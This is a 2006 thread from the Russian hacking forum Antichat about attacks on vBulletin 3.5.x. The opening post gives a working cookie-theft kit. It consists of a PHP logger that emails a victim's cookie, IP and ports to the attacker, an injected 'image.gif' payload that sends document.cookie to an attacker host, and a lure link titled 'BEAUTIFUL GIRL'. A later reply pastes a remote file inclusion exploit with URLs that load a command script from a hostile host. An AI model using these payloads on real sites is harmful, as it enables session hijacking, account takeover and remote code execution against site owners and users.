Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Уязвимости в vBulletin v3.5.x ( test: v3.5.4 ) (https://forum.antichat.xyz/showthread.php?t=17968)

liauliau 20.04.2006 18:06

Уязвимости в vBulletin v3.5.x ( test: v3.5.4 )
 
работает отлично! ;)

Код:

( 1 )

--------------------------------------------------------------------

Name file:  exploit.php

--------------------------------------------------------------------


<?php
$ip_adresse = $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip и: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie = $_GET['c'];
?>

<?php
$myemail = "YOUR ADDRESS E-MAIL";
$today = date("l, F j, Y, g:i a") ;
$subject = "Xss Vbulletin" ;
$message = "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today  \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>



--------------------------------------------------------------------

<?php
$myemail = "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------


( 2 )

--------------------------------------------------------------------

Name file:  image.gif

--------------------------------------------------------------------


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >


--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------


( 3 )

--------------------------------------------------------------------

Like Using
--------------------------------------------------------------------

1°  new thread
2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3°  Submit
4°  It waits for

--------------------------------------------------------------------


pch 20.04.2006 19:31

Видимо, работает только при разрешённых html тэгах.
ИМХО - лажа

vectorg 20.04.2006 19:31

что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?

liauliau 20.04.2006 21:14

Цитата:

Сообщение от VectorG
что-то мне подсказывает, что это не то, о чём гласит топик...
кто опровергнет мои сомнения?


video нужнa ?

limpompo 20.04.2006 21:23

liauliau - давай сними им видео а то до них это всё плохо доходит...

Lord Nikon 20.04.2006 21:24

слушай реально сними видео.=)

liauliau 20.04.2006 21:55

Цитата:

Сообщение от Lord Nikon
слушай реально сними видео.=)

ok ;) 1min

k1b0rg 20.04.2006 21:57

чо тут непонятного, работает на xss в картинках ,осел картинки обработает как JS. Код его сплойта, работает как сниффер+отправляет все по мылу, учите господа php+JS

сплойт гавно

liauliau 20.04.2006 22:23

короткое video тут

Azazel 20.04.2006 22:37

Всё бы здорово если бы не html on.
Вот полез на http://packetstorm.linuxsecurity.com/ и нашёл вот это
Код:

Remote File Inclusion in VBulletin ImpEx
Date :
12 / 4 / 2006
Software : 
VBulletin ImpEx
version :

VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4

The bug reside in  :

ImpExModule.php
ImpExController.php
ImpExDisplay.php

Exploit :

(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id
(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id
(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id
Discovery by :
Dr.Jr7
GreeTz :
special greet to Qptan & Mr.SNAKE  & trooq
and to my all frinds in www.lezr.com/vb
see u :}



Время: 00:38